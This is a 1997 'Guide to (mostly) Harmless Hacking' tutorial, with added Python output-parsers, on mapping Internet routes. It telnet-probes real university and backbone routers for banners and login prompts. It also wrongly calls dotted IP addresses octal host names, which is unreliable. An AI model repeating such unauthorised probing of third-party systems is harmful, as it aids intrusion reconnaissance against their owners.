Well, what this tells me is that people who want to set up Internet host computers in Botswana usually rely on computers in South Africa to connect them. Let's learn more about South Africa. Since we are still in the nslookup program, I command it to tell me what computers are nameservers for South Africa:

> za.
Server:  swcp.com
Address:  198.59.115.2

Non-authoritative answer:
za      nameserver = DAISY.EE.UND.AC.za
za      nameserver = UCTHPX.UCT.AC.za
za      nameserver = HIPPO.RU.AC.za
za      nameserver = RAIN.PSG.COM
za      nameserver = MUNNARI.OZ.AU
za      nameserver = NS.EU.NET
za      nameserver = NS.UU.NET
za      nameserver = UUCP-GW-1.PA.DEC.COM
za      nameserver = APIES.FRD.AC.za

Authoritative answers can be found from:
DAISY.EE.UND.AC.za      inet address = 146.230.192.18
UCTHPX.UCT.AC.za        inet address = 137.158.128.1
HIPPO.RU.AC.za          inet address = 146.231.128.1
RAIN.PSG.COM            inet address = 147.28.0.34
MUNNARI.OZ.AU           inet address = 128.250.22.2
MUNNARI.OZ.AU           inet address = 128.250.1.21
NS.EU.NET               inet address = 192.16.202.11
UUCP-GW-1.PA.DEC.COM    inet address = 204.123.2.18
UUCP-GW-1.PA.DEC.COM    inet address = 16.1.0.18
APIES.FRD.AC.za         inet address = 137.214.80.1

***********************
Newbie note: What is inet address = 137.214.80.1 supposed to mean? That's the name of a computer on the Internet (inet) -- in this case APIES.FRD.AC -- in octal. Octal is like regular numbers except in base 8 rather than base 10. All computer names on the Internet must be changed into numbers so that other computers can understand them.
**********************

Aha! Some of those nameservers are located outside South Africa. We see computers in Australia (au) and the US (com domain).

Next, we exit the nslookup program with the command ^D. That's made by holding down the control key while hitting the small "d" key. It is VERY IMPORTANT to exit nslookup this way and not with ^C.

Next, we take one of the nameservers in South Africa and ask:

->whois HIPPO.RU.AC.ZA
[No name] (HIPPO)
   Hostname: HIPPO.RU.AC.ZA
   Address: 146.231.128.1
   System: SUN running SUNOS

   Domain Server

   Record last updated on 24-Feb-92.

   To see this host record with registered users, repeat the command with
   a star ('*') before the name; or, use '%' to show JUST the registered users.
The InterNIC Registration Services Host contains ONLY Internet Information
(Networks, ASN's, Domains, and POC's).
Please use the whois server at nic.ddn.mil for MILNET Information.

Kewl! This tells us what kind of computer it is -- a Sun -- and the operating system, Sun OS.

Now, just for variety, I use the whois command with the numerical address of one of the nameservers. This doesn't always give back the text name, but sometimes it works. And, voila, we get:

->whois 146.230.192.18
[No name] (DAISY1)
   Hostname: DAISY.EE.UND.AC.ZA
   Address: 146.230.192.18
   System: HP-9000 running HP-UX

   Domain Server

   Record last updated on 14-Sep-94.

Ah, but all this is doing so far is just telling us info about who is a nameserver for whom. Now how about directly mapping a route from my computer to South Africa? For that we will use the traceroute command.

************************
Netiquette tip: The traceroute program is intended for use in network testing, measurement and management. It should be used primarily for manual fault isolation, like the time I couldn't email my friend in Northern Ireland. Because of the load it could impose on the network, it is unwise to use traceroute from automated scripts which could cause that program to send out huge numbers of queries. Use it too much and your ISP may start asking you some sharp questions.
************************

************************
YOU COULD GO TO JAIL WARNING: If you just got an idea of how to use traceroute for a denial of service attack, don't call your favorite journalist and tell him or her that you are plotting a denial of service attack against the ISPs that serve famous people like Bill Clinton and Carolyn Meinel!:-) Don't write that script. Don't use it. If you do, I'll give another interview to PC World magazine (http://www.pcworld.com/news/newsradio/meinel/index.html) about how a three-year-old could run the attack. And if you get caught we'll all laugh at you as you get hustled off in chains while your journalist friend gets a $250K advance on his or her book deal about you.
************************

I give the command:

->whereis traceroute
traceroute: /usr/local/bin/traceroute

OK, now we're ready to map in earnest. I give the command:

->/usr/local/bin/traceroute DAISY.EE.UND.AC.ZA

And the answer is:

traceroute to DAISY.EE.UND.AC.ZA (146.230.192.18), 30 hops max, 40 byte packets
 1  sisko (198.59.115.1)  3 ms  4 ms  4 ms
 2  glory-cyberport.nm.westnet.net (204.134.78.33)  47 ms  8 ms  4 ms
 3  ENSS365.NM.ORG (129.121.1.3)  5 ms  10 ms  7 ms
 4  h4-0.cnss116.Albuquerque.t3.ans.net (192.103.74.45)  17 ms  41 ms  28 ms
 5  f2.t112-0.Albuquerque.t3.ans.net (140.222.112.221)  7 ms  6 ms  5 ms
 6  h14.t16-0.Los-Angeles.t3.ans.net (140.223.17.9)  31 ms  39 ms  84 ms
 7  h14.t8-0.San-Francisco.t3.ans.net (140.223.9.13)  67 ms  43 ms  68 ms
 8  enss220.t3.ans.net (140.223.9.22)  73 ms  58 ms  54 ms
 9  sl-mae-w-F0/0.sprintlink.net (198.32.136.11)  97 ms  319 ms  110 ms
10  sl-stk-1-H11/0-T3.sprintlink.net (144.228.10.109)  313 ms  479 ms  473 ms
11  sl-stk-2-F/T.sprintlink.net (198.67.6.2)  179 ms  *  *
12  sl-dc-7-H4/0-T3.sprintlink.net (144.228.10.106)  164 ms  *  176 ms
13  sl-dc-7-F/T.sprintlink.net (198.67.0.1)  143 ms  129 ms  134 ms
14  gsl-dc-3-Fddi0/0.gsl.net (204.59.144.197)  135 ms  152 ms  130 ms
15  204.59.225.66 (204.59.225.66)  583 ms  545 ms  565 ms
16  * * *
17  e0.csir00.uni.net.za (155.232.249.1)  516 ms  436 ms  400 ms
18  s1.und00.uni.net.za (155.232.70.1)  424 ms  485 ms  492 ms
19  e0.und01.uni.net.za (155.232.190.2)  509 ms  530 ms  459 ms
20  s0.und02.uni.net.za (155.232.82.2)  650 ms  *  548 ms
21  Gw-Uninet1.CC.und.ac.za (146.230.196.1)  881 ms  517 ms  478 ms
22  cisco-unp.und.ac.za (146.230.128.8)  498 ms  545 ms  *
23  IN.ee.und.ac.za (146.230.192.18)  573 ms  585 ms  493 ms

So what does all this stuff mean? The number in front of each line is the number of hops since leaving the computer that has the shell account I am using.
The second entry is the name of the computer through which this route passes, first in text, and then in parentheses its numerical representation. The numbers after that are the time in milliseconds it takes for each of three probe packets in a row to make that hop. When an * appears, that probe for the hop timed out. In the case of this traceroute command, any time greater than 3 seconds causes an * to be printed out.

How about hop 16? It gave us no info whatsoever. That silent gateway may be the result of a bug in the 4.1, 4.2 or 4.3BSD Unix network code. A computer running one of these operating systems sends an "unreachable" message. Or it could be something else. Sorry, I'm not enough of a genius yet to figure out this one for sure.

Are we having phun yet?

************************
Evil genius tip: If you want to get really, truly excruciating detail on the traceroute command, while in your shell account type in the command:

->man traceroute

I promise, on-line manual stuff is often written in a witty, entertaining fashion. Especially the Sun OS manual. Honest!
************************

************************
Note for the shell-account-challenged: If you have Windows 95, you can get the same results -- I mean, for mapping the Internet, not going to jail -- using the "tracert" command. Here's how it works:

1. Open a PPP connection. For example, if you use Compuserve or AOL, make a connection, then minimize your on-line access program.
2. Click on the Start menu.
3. Open a DOS window.
4. At the DOS prompt type in "tracert distant.computer.com" where "distant.computer.com" is replaced by the name of the computer to which you want to trace a route. Press the Enter key.
5. Be patient. Especially if you are tracing a route to a distant computer, it takes a while to make all the connections. Every time your computer connects to another computer on the Internet, it first has to trace a route to the other computer. That's why it sometimes takes a long while for your browser to start downloading a Web page.
6. If you decide to use Windows for this hacking lesson, Damien Sorder has a message for us: "DON'T ENCOURAGE THEM TO USE WIN95!@#$!@#!" He's right, but since most of you reading this are consenting adults, I figure it's your funeral if you stoop to Windows hacking on an AOL PPP connection!
***********************

Now this is getting interesting. We know that Daisy is directly connected to at least one other computer, and that computer in turn is connected to cisco-unp.und.ac.za. Let's learn a little something about this cisco-unp.und.ac.za, OK?

First, we can guess from the name that it is a Cisco router. In fact, the first hop in this route is to a computer named "sisko," which is also probably a Cisco router. Since 85% of the routers in the world are Ciscos, that's a pretty safe bet. But we are going to not only make sure cisco-unp.und.ac.za is a Cisco. We are also going to find out the model number, and a few other goodies.

First we try out whois:

->whois cisco-unp.und.ac.za
No match for "CISCO-UNP.UND.AC.ZA".

The InterNIC Registration Services Host contains ONLY Internet Information
(Networks, ASN's, Domains, and POC's).
Please use the whois server at nic.ddn.mil for MILNET Information.

Huh? Traceroute tells us cisco-unp.und.ac.za exists, but whois can't find it! Actually this is a common problem, especially trying to use whois on distant computers.

What do we do next? Well, if you are lucky, the whereis command will turn up another incredibly cool program: dig!

**********************
Newbie note: Dig stands for "domain information groper." It does a lot of the same things as nslookup. But dig is a much older program, in many ways harder to use than nslookup. For details on dig, use the command from your shell account "man dig."
**********************

In fact, on my shell account I found I could run dig straight from my bash prompt:

->dig CISCO-UNP.UND.AC.ZA

; <<>> DiG 2.0 <<>> CISCO-UNP.UND.AC.ZA
;; res options: init recurs defnam dnsrch
;; got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6
;; flags: qr aa rd ra; Ques: 1, Ans: 4, Auth: 5, Addit: 5
;; QUESTIONS:
;;      CISCO-UNP.UND.AC.ZA, type = A, class = IN

;; ANSWERS:
CISCO-UNP.UND.AC.ZA.    86400   A       146.230.248.1
CISCO-UNP.UND.AC.ZA.    86400   A       146.230.12.1
CISCO-UNP.UND.AC.ZA.    86400   A       146.230.60.1
CISCO-UNP.UND.AC.ZA.    86400   A       146.230.128.8

;; AUTHORITY RECORDS:
und.ac.za.      86400   NS      Eagle.und.ac.za.
und.ac.za.      86400   NS      Shrike.und.ac.za.
und.ac.za.      86400   NS      ucthpx.uct.ac.za.
und.ac.za.      86400   NS      hiPPo.ru.ac.za.
und.ac.za.      86400   NS      Rain.psg.com.

;; ADDITIONAL RECORDS:
Eagle.und.ac.za.        86400   A       146.230.128.15
Shrike.und.ac.za.       86400   A       146.230.128.13
ucthpx.uct.ac.za.       86400   A       137.158.128.1
hiPPo.ru.ac.za.         86400   A       146.231.128.1
Rain.psg.com.           14400   A       147.28.0.34

;; Total query time: 516 msec
;; FROM: llama to SERVER: default -- 198.59.115.2
;; WHEN: Fri Jan 17 13:03:49 1997
;; MSG SIZE  sent: 37  rcvd: 305

Ahhh, nice. The first few lines, the ones preceded by the ;; marks, mostly tell what the default settings of the command are and what we asked it. The line "Ques: 1, Ans: 4, Auth: 5, Addit: 5" tells us how many items we'll get under each topic of questions, answers, authority records, and additional records. (You will get different numbers on that line with different queries.) This "records" stuff refers to information stored under the domain name system.

We learn from dig that class = IN, meaning CISCO-UNP.UND.AC.ZA is a domain name within the Internet. But we already knew that. The first really *new* thing we learn is that four routers all share the same domain name. We can tell that because their numerical Internet numbers are different. The reverse can also happen: several domain names can all belong to the same numerical address.
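Reading a traceroute by eye works for one route, but the three things the lesson points out (the * timeouts, the silent hop 16, and the jump to 500+ ms at hop 15 where the route crosses to South Africa) are exactly what you want a script to flag when you are doing fault isolation for your ISP. The following is an added example, not code from the GTMHH: it parses the traceroute output format shown above. SAMPLE is a constructed excerpt of the lesson's own route to DAISY, and the parser assumes one responding host per hop line, as in that output (the threshold of 200 ms for a "latency jump" is my own choice).

```python
"""Parse traceroute output and flag the hops worth a second look.

Added example, not part of this GTMHH. SAMPLE is a constructed excerpt of the
lesson's own route to DAISY; the parser assumes one responding host per hop,
as in that output.
"""
import re
from dataclasses import dataclass, field

SAMPLE = """\
traceroute to DAISY.EE.UND.AC.ZA (146.230.192.18), 30 hops max, 40 byte packets
 1  sisko (198.59.115.1)  3 ms  4 ms  4 ms
 2  glory-cyberport.nm.westnet.net (204.134.78.33)  47 ms  8 ms  4 ms
11  sl-stk-2-F/T.sprintlink.net (198.67.6.2)  179 ms  *  *
14  gsl-dc-3-Fddi0/0.gsl.net (204.59.144.197)  135 ms  152 ms  130 ms
15  204.59.225.66 (204.59.225.66)  583 ms  545 ms  565 ms
16  * * *
17  e0.csir00.uni.net.za (155.232.249.1)  516 ms  436 ms  400 ms
23  IN.ee.und.ac.za (146.230.192.18)  573 ms  585 ms  493 ms
"""

HOP_RE = re.compile(r"^\s*(\d+)\s+(.*)$")                     # "16  ..." lines
HOST_RE = re.compile(r"^(\S+)\s+\((\d{1,3}(?:\.\d{1,3}){3})\)\s*(.*)$")  # "name (a.b.c.d) rest"


@dataclass
class Hop:
    number: int
    host: str = None                           # None when the hop never answered
    ip: str = None
    rtts: list = field(default_factory=list)   # ms per probe; None for '*'

    @property
    def silent(self):
        return all(r is None for r in self.rtts)

    @property
    def best(self):
        answered = [r for r in self.rtts if r is not None]
        return min(answered) if answered else None


def parse_traceroute(text):
    """Return one Hop per numbered line; the 'traceroute to ...' header is skipped."""
    hops = []
    for line in text.splitlines():
        m = HOP_RE.match(line)
        if not m:
            continue
        hop = Hop(number=int(m.group(1)))
        rest = m.group(2)
        hm = HOST_RE.match(rest)
        if hm:
            hop.host, hop.ip, rest = hm.group(1), hm.group(2), hm.group(3)
        for tok in rest.split():
            if tok == "*":
                hop.rtts.append(None)          # probe timed out
            elif tok != "ms":
                hop.rtts.append(float(tok))
        hops.append(hop)
    return hops


def find_anomalies(hops, jump_ms=200.0):
    """Silent hops, partial probe loss, and big jumps in best-case latency."""
    notes = []
    prev_best = None
    for hop in hops:
        if hop.silent:
            notes.append((hop.number, "silent: no probe answered"))
            continue                           # keep comparing against the last hop that answered
        if any(r is None for r in hop.rtts):
            notes.append((hop.number, "partial loss: some probes timed out"))
        if prev_best is not None and hop.best - prev_best > jump_ms:
            notes.append((hop.number, f"latency jump of {hop.best - prev_best:.0f} ms"))
        prev_best = hop.best
    return notes


if __name__ == "__main__":
    for number, why in find_anomalies(parse_traceroute(SAMPLE)):
        print(f"hop {number}: {why}")
```

On the sample this reports partial loss at hop 11, a latency jump at hop 15 and the silent hop 16; a big jump in the *best* of the three times, rather than in any single probe, is what distinguishes a slow link from one noisy probe.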
If you use the dig command on each link in the route to DAISY.EE.UND.AC.ZA, you'll find a tremendous variation in whether the routers map to the same or different domain names. As hackers, we want to get wise to all these variations in how domain names are associated with boxes.

But we can still learn even more about that Cisco router named CISCO-UNP.UND.AC.ZA. We go back to nslookup and run it in interactive mode:

->/usr/etc/nslookup
Default Server:  swcp.com
Address:  198.59.115.2

>

Now let's do something new with nslookup. This is a command that comes in really, really handy when we're playing vigilante and need to persecute a spammer or bust a child porn Web site or two. Here's how we can get the email address for the sysadmin of an Internet host computer.

> set type=soa

Then I enter the name of the computer about which I am curious. Note that I put a period after the end of the host name. It often helps to do this with nslookup:

> CISCO-UNP.UND.AC.ZA.
Server:  swcp.com
Address:  198.59.115.2

*** No start of authority zone information is available for CISCO-UNP.UND.AC.ZA.

Now what do I do? Give up? No, I'm a hacker wannabe, right? So I try entering just part of the domain name, again remembering to put a period at the end:

> und.ac.za.
Server:  swcp.com
Address:  198.59.115.2

und.ac.za
        origin = Eagle.und.ac.za
        mail addr = postmaster.und.ac.za
        serial=199610255, refresh=10800, retry=3600, expire=3000000, min=86400
Eagle.und.ac.za         inet address = 146.230.128.15
Shrike.und.ac.za        inet address = 146.230.128.13
ucthpx.uct.ac.za        inet address = 137.158.128.1
hiPPo.ru.ac.za          inet address = 146.231.128.1
Rain.psg.com            inet address = 147.28.0.34

Bingo!!! I got the email address of a sysadmin whose domain includes that Cisco router, AND the IP addresses of some other boxes he or she administers. But notice it doesn't list any of those routers which the sysadmin undoubtedly knows a thing or two about.

But we aren't done yet with cisco-unp.und.ac.za (146.230.128.8). Of course we have a pretty good guess that it is a Cisco router. But why stop with a mere guess when we can port surf? So we fall back on our friend the telnet program and head for port 2001:

->telnet 146.230.128.8 2001
Trying 146.230.128.8 ...
Connected to 146.230.128.8.
Escape character is '^]'.

C
****************************************************
*** Welcome to the University of Natal           ***
***                                              ***
*** Model : Cisco 4500 with ATM and 8 BRI ports  ***
***                                              ***
*** Dimension Data Durban - 031-838333           ***
***                                              ***
****************************************************

Hey, we know now that this is a Cisco model 4500 owned by the University of Natal, and we even got a phone number for the sysadmin. From this we also can infer that this router handles a subnet which serves the U of Natal and includes daisy.

But why did I telnet to port 2001? It's in common use among routers as the administrative port. How do I know that? From the RFC (request for comments) that covers all commonly used port assignments. You can find a copy of this RFC at http://www.internic.net/help/domain/rfc1739.txt. Read it and you'll be in for some happy port surfing!
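The two nslookup sessions in this lesson (the "set type=ns" answer for za. and the "set type=soa" answer for und.ac.za.) are the kind of output you end up pasting into an abuse report or a troubleshooting ticket, so it is worth being able to read them by script. The following is an added example, not code from the GTMHH or from nslookup itself. NS_ANSWER and SOA_ANSWER are constructed excerpts of the lesson's own transcripts; the "inet address" lines are matched as four dot-separated decimal numbers. The SOA "mail addr" field is an RNAME, in which the first dot stands for the @ of the mailbox and a literal dot in the mailbox part is escaped as backslash-dot, which is why postmaster.und.ac.za becomes postmaster@und.ac.za.

```python
"""Turn nslookup's "set type=ns" and "set type=soa" answers into structured data.

Added example; not part of the GTMHH. The two transcripts below are
constructed excerpts of the lesson's own sessions.
"""
import re

NS_ANSWER = """\
Server:  swcp.com
Address:  198.59.115.2

Non-authoritative answer:
za      nameserver = DAISY.EE.UND.AC.za
za      nameserver = RAIN.PSG.COM
za      nameserver = MUNNARI.OZ.AU
za      nameserver = APIES.FRD.AC.za

Authoritative answers can be found from:
DAISY.EE.UND.AC.za      inet address = 146.230.192.18
RAIN.PSG.COM            inet address = 147.28.0.34
MUNNARI.OZ.AU           inet address = 128.250.22.2
MUNNARI.OZ.AU           inet address = 128.250.1.21
APIES.FRD.AC.za         inet address = 137.214.80.1
"""

SOA_ANSWER = """\
Server:  swcp.com
Address:  198.59.115.2

und.ac.za
        origin = Eagle.und.ac.za
        mail addr = postmaster.und.ac.za
        serial=199610255, refresh=10800, retry=3600, expire=3000000, min=86400
Eagle.und.ac.za         inet address = 146.230.128.15
"""

NS_RE = re.compile(r"^(\S+)\s+nameserver\s*=\s*(\S+)", re.M)
GLUE_RE = re.compile(r"^(\S+)\s+inet address\s*=\s*(\d{1,3}(?:\.\d{1,3}){3})", re.M)
SOA_FIELD_RE = re.compile(r"(serial|refresh|retry|expire|min)\s*=\s*(\d+)")


def parse_ns(text):
    """Zone name, its nameservers, and the glue addresses nslookup printed for them."""
    zone, nameservers, glue = None, [], {}
    for m in NS_RE.finditer(text):
        zone = m.group(1).rstrip(".").lower()
        nameservers.append(m.group(2).rstrip(".").lower())
    for m in GLUE_RE.finditer(text):
        glue.setdefault(m.group(1).rstrip(".").lower(), []).append(m.group(2))
    return {
        "zone": zone,
        "authoritative": "Non-authoritative answer" not in text,   # cached vs. fresh
        "nameservers": nameservers,
        "glue": glue,
    }


def outside_zone(result):
    """Nameservers whose own name is not under the zone's top-level domain
    (the lesson's point that za. is partly served from .com and .au boxes)."""
    tld = result["zone"].split(".")[-1]
    return [ns for ns in result["nameservers"] if ns.split(".")[-1] != tld]


def rname_to_email(rname):
    """SOA RNAME -> mailbox: first unescaped dot becomes '@', '\\.' becomes '.'."""
    i = 0
    while i < len(rname):
        if rname[i] == "\\":
            i += 2
            continue
        if rname[i] == ".":
            return rname[:i].replace("\\.", ".") + "@" + rname[i + 1:]
        i += 1
    return rname


def parse_soa(text):
    """Origin, contact mailbox and the five SOA timers, as nslookup prints them."""
    soa = {}
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("origin"):
            soa["origin"] = line.split("=", 1)[1].strip()
        elif line.startswith("mail addr"):
            soa["contact"] = rname_to_email(line.split("=", 1)[1].strip())
        else:
            for name, value in SOA_FIELD_RE.findall(line):
                soa[name] = int(value)
    return soa


if __name__ == "__main__":
    ns = parse_ns(NS_ANSWER)
    print("served from outside the zone:", outside_zone(ns))
    print("contact:", parse_soa(SOA_ANSWER)["contact"])
```

The "authoritative" flag simply records whether nslookup printed "Non-authoritative answer", which is the cached-data caveat the lesson explains; if it matters (say, you are about to report a host), re-query the servers listed under "Authoritative answers can be found from" rather than trusting the cache.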
************************
Evil Genius tip: there are a bunch of ports used by Cisco routers:

cisco-fna       130/tcp    cisco FNATIVE
cisco-tna       131/tcp    cisco TNATIVE
cisco-sys       132/tcp    cisco SYSMAINT
licensedaemon   1986/tcp   cisco license management
tr-rsrb-p1      1987/tcp   cisco RSRB Priority 1 port
tr-rsrb-p2      1988/tcp   cisco RSRB Priority 2 port
tr-rsrb-p3      1989/tcp   cisco RSRB Priority 3 port
stun-p1         1990/tcp   cisco STUN Priority 1 port
stun-p2         1991/tcp   cisco STUN Priority 2 port
stun-p3         1992/tcp   cisco STUN Priority 3 port
snmp-tcp-port   1993/tcp   cisco SNMP TCP port
stun-port       1994/tcp   cisco serial tunnel port
perf-port       1995/tcp   cisco perf port
tr-rsrb-port    1996/tcp   cisco Remote SRB port
gdp-port        1997/tcp   cisco Gateway Discovery Protocol
x25-svc-port    1998/tcp   cisco X.25 service (XOT)
tcp-id-port     1999/tcp   cisco identification port
************************

But what about the "normal" telnet port, which is 23? Since it is the "normal" port, the one you usually go to when you want to log in, we don't need to put the 23 after the host name:

->telnet 146.230.128.8
Trying 146.230.128.8 ...
Connected to 146.230.128.8.
Escape character is '^]'.

C
*************************************************************************
*** Welcome to the University of Natal                                ***
***                                                                   ***
*** Model : Cisco 4500 with ATM and 8 BRI ports                       ***
***                                                                   ***
*** Dimension Data Durban - 031-838333                                ***
***                                                                   ***
*************************************************************************

User Access Verification

Password:

Hey, this is interesting, no username requested, just a password. If I were the sysadmin, I'd make it a little harder to log in.

Hmmm, what happens if I try to port surf finger that site? That means telnet to the finger port, which is 79:

->telnet 146.230.128.8 79
Trying 146.230.128.8 ...
Connected to 146.230.128.8.
Escape character is '^]'.

C
*************************************************************************
*** Welcome to the University of Natal                                ***
***                                                                   ***
*** Model : Cisco 4500 with ATM and 8 BRI ports                       ***
***                                                                   ***
*** Dimension Data Durban - 031-838333                                ***
***                                                                   ***
*************************************************************************

    Line     User      Host(s)           Idle Location
*   2 vty 0            idle                 0 kitsune.swcp.com
  BR0:2              Sync PPP          00:00:00
  BR0:1              Sync PPP          00:00:00
  BR1:2              Sync PPP          00:00:00
  BR1:1              Sync PPP          00:00:00
  BR2:2              Sync PPP          00:00:01
  BR2:1              Sync PPP          00:00:00
  BR5:1              Sync PPP          00:00:00

Connection closed by foreign host.

Notice that finger lists the connection to the computer I was port surfing from: kitsune. But no one else seems to be on line just now. Please remember, when you port surf, unless you know how to do IP spoofing, your target computer knows where you came from. Of course I will be a polite guest.

Now let's try the obvious. Let's telnet to the login port of daisy. I use the numerical address just for the heck of it:

->telnet 146.230.192.18
Trying 146.230.192.18 ...
Connected to 146.230.192.18.
Escape character is '^]'.

NetBSD/i386 (daisy.ee.und.ac.za) (ttyp0)

login:

Hey, this is interesting. Since we now know this is a university, that's probably the electrical engineering (EE) department. And NetBSD is a freeware Unix that runs on a PC! Probably an 80386 box. Getting this info makes me almost feel like I've been hanging out at the University of Natal EE computer lab. It sounds like a friendly place. Judging from their router, security is somewhat lax, they use cheap computers, and messages are friendly.

Let's finger and see who's logged in just now. Since I am already in the telnet program (I can tell by the prompt "telnet>"), I go to daisy using the "open" command:

telnet> open daisy.ee.und.ac.za 79
Trying 146.230.192.18 ...
telnet: connect: Connection refused
telnet> quit

Well, that didn't work, so I exit telnet and try the finger program on my shell account computer:

->finger @daisy.ee.und.ac.za
[daisy.ee.und.ac.za]
finger: daisy.ee.und.ac.za: Connection refused

Sigh. It's hard to find open finger ports any more. But it's a good security practice to close finger. Damien Sorder points out, "If you install the new Linux distributions, it comes with Cfingerd. Why would I (and others) want to shut it down? Not because of hackers and abuse or some STUPID S*** like that. Because it gives out way too much information when you finger a single user. You get machine load and all the user information."

I manage to pull up a little more info on how to map the interconnections of University of Natal computers with a search of the Web using http://digital.altavista.com. It links me to the site http://www.frd.ac.za/uninet/sprint.html, which is titled "Traffic on the UNINET-SPRINTLINK Link." However, all the links to network traffic statistics from that site are dead.

Next, let's look into number 20 on that traceroute that led us to the University of Natal. You can pretty much expect that links in the middle of a long traceroute will be big computers owned by the bigger companies that form the backbone of the Internet.

->telnet 155.232.82.2 2001
Trying 155.232.82.2 ...
Connected to 155.232.82.2.
Escape character is '^]'.

Id: und02
Authorised Users Only!
------------------------

User Access Verification

Username:

Yup, we're out of friendly territory now. And since port 2001 works, it may be a router. Just for laughs, though, let's go back to the default telnet port:

->telnet 155.232.82.2
Trying 155.232.82.2 ...
Connected to 155.232.82.2.
Escape character is '^]'.

Id: und02
Authorised Users Only!
------------------------

User Access Verification

Username:

Now just maybe this backbone-type computer will tell us gobs of stuff about all the computers it is connected to. We try telnetting to the netstat port, 15. This, if it happens to be open to the public, will tell us all about the computers that connect through it:

->telnet 155.232.82.2 15
Trying 155.232.82.2 ...
telnet: connect: Connection refused

Sigh. I gave an example of the incredible wealth of information you can get from netstat on the GTMHH on port surfing. But every day it is harder to find a public netstat port. That's because the information netstat gives is so useful to computer criminals. In fact, port 15 is no longer reserved as the netstat port (as of 1994, according to the RFC). So you will find few boxes using it.

******************************
Newbie note: want to know what port assignments your ISP uses? Sorder points out "/etc/services on most machines will [tell you this]." How can you read that information? Try this: First, change to the /etc/ directory:

->cd /etc

Then command it to print it out to your screen with:

->more services
#
# @(#)services 1.16 90/01/03 SMI
#
# Network services, Internet style
# This file is never consulted when the NIS are running
#
tcpmux          1/tcp                   # rfc-1078
echo            7/tcp
... and so on...

Alas, just because your shell account has a list of port assignments doesn't mean they are actually in use. It also probably won't list specialized services like all those Cisco router port assignments.
*************************

In fact, after surfing about two dozen somewhat randomly chosen netstat ports, the only answer I get other than "Connection refused" is:

->telnet ns.nmia.com 15
Trying 198.59.166.10 ...
Connected to ns.nmia.com.
Escape character is '^]'.
Yes, but will I see the EASTER BUNNY in skintight leather at an IRON MAIDEN concert?

Now what about all those Sprintlink routers in that traceroute? That's a major Internet backbone based in the US provided by Sprint. You can get some information on the topology of the Sprintlink backbone at http://www.sprintlink.net/SPLK/HB21.html#2.2.
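The /etc/services file shown in the newbie note above has a simple, stable format (service name, port/protocol, optional aliases, "#" comments), and it is the first place to look when a line in a log or a netstat listing mentions a port you don't recognize. The following is an added example, not code from the GTMHH or from any Unix distribution: a parser for that format plus the two lookups you actually need, name-from-port and port-from-name. SERVICES_SAMPLE is constructed; it mixes the lines from the lesson's "more services" output with a few of the Cisco assignments from the lesson's port table so the lookups have something to find. Port 2001 is deliberately absent, matching the lesson's caveat that the file usually does not list specialized router ports.

```python
"""Read the /etc/services format and answer "what is port N?" questions.

Added example, not from the GTMHH. SERVICES_SAMPLE is constructed from the
lesson's own /etc/services excerpt and a few entries from its Cisco port table.
"""

SERVICES_SAMPLE = """\
#
# Network services, Internet style
#
tcpmux          1/tcp                           # rfc-1078
echo            7/tcp
echo            7/udp
netstat         15/tcp
telnet          23/tcp
finger          79/tcp
cisco-fna       130/tcp         FNATIVE         # cisco FNATIVE
snmp-tcp-port   1993/tcp                        # cisco SNMP TCP port
gdp-port        1997/tcp                        # cisco Gateway Discovery Protocol
ircd            6667/tcp                        # Internet Relay Chat
"""


def parse_services(text):
    """Return {(port, proto): (name, [aliases])}, ignoring comments and blank lines."""
    table = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop trailing comment, if any
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2 or "/" not in fields[1]:
            continue                              # malformed line: skip rather than crash
        name, portproto, aliases = fields[0], fields[1], fields[2:]
        port, proto = portproto.split("/", 1)
        table[(int(port), proto)] = (name, aliases)
    return table


def service_name(table, port, proto="tcp"):
    """Canonical name for a port, or None when the file has no entry for it."""
    entry = table.get((port, proto))
    return entry[0] if entry else None


def port_of(table, name, proto="tcp"):
    """Port for a service name or alias, or None when it is not listed."""
    for (port, p), (svc, aliases) in table.items():
        if p == proto and (svc == name or name in aliases):
            return port
    return None


if __name__ == "__main__":
    table = parse_services(SERVICES_SAMPLE)
    for port in (23, 79, 2001):
        print(port, service_name(table, port) or "not listed")
```

A port that comes back as "not listed" is not a port that is unused; it is one the file simply has no name for, which is the lesson's point about the Cisco administrative port.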
Alas, Sprintlink used to give out much more information than they do today. All I can pick up on their Web site today is pretty vague.

Sigh. The Internet is getting less friendly, but more secure. Some day when we're really ancient, say five years from now, we'll be telling people, "Why, I remember when we could port surf! Why, there used to be zillions of open ports and people could choose ANY password they wanted. Hmph! Today it's just firewalls everywhere you look!"

Adds Sorder, "Gee. How do you think people like me feel.. port surfing over 6 years ago."

Our thanks to Damien Sorder (jericho@dimensional.com) for assistance in reviewing and contributing to this GTMHH.
_________________________________________________________
Subscribe to our email list by emailing to hacker@techbroker.com with message "subscribe" or join our Hacker forum at http://www.infowar.com/cgi-shl/login.exe.

Want to share some kewl stuph with the Happy Hacker list? Correct mistakes? Send your messages to hacker@techbroker.com. To send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com and be sure to state in your message that you want me to keep this confidential. If you wish your message posted anonymously, please say so! Please direct flames to dev/null@techbroker.com. Happy hacking!

Copyright 1997 Carolyn P. Meinel. You may forward or post on your Web site this GUIDE TO (mostly) HARMLESS HACKING as long as you leave this notice at the end.
________________________________________________________

___________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol. 3 Number 3
How to keep from getting kicked off IRC!
____________________________________________________________

Our thanks to Patrick Rutledge, Warbeast, Meltdown and k1neTiK, who all provided invaluable information on the burning question of the IRC world: help, they're nuking meee...

What's the big deal about IRC and hackers?

Sheesh, IRC is sooo easy to use... until you get on a server where hacker wars reign. What the heck do you do to keep from getting clobbered over and over again? Of course you could just decide your enemies can go to heck. But let's say you'd rather hang in there.

You may want to hang in there because if you want to make friends quickly in the hacker world, one of the best ways is over Internet Relay Chat (IRC). On IRC a group of people type messages back and forth on a screen in almost real time. It can be more fun than Usenet where it can take from minutes to hours for people's replies to turn up. And unlike Usenet, if you say something you regret, it's soon gone from the screen. Ahem. That is, it will soon be gone if no one is logging the session.

In some ways IRC is like CB radio, with lots of folks flaming and making fools of themselves in unique and irritating ways. So don't expect to see timeless wisdom and wit scrolling down your computer screen. But because IRC is such an inexpensive way for people from all over the world to quickly exchange ideas, it is widely used by hackers. Also, given the wars you can fight for control of IRC channels, it can give you a good hacker workout.

To get on IRC you need both an IRC client program and you need to connect to a Web site or Internet Service Provider (ISP) that is running an IRC server program.

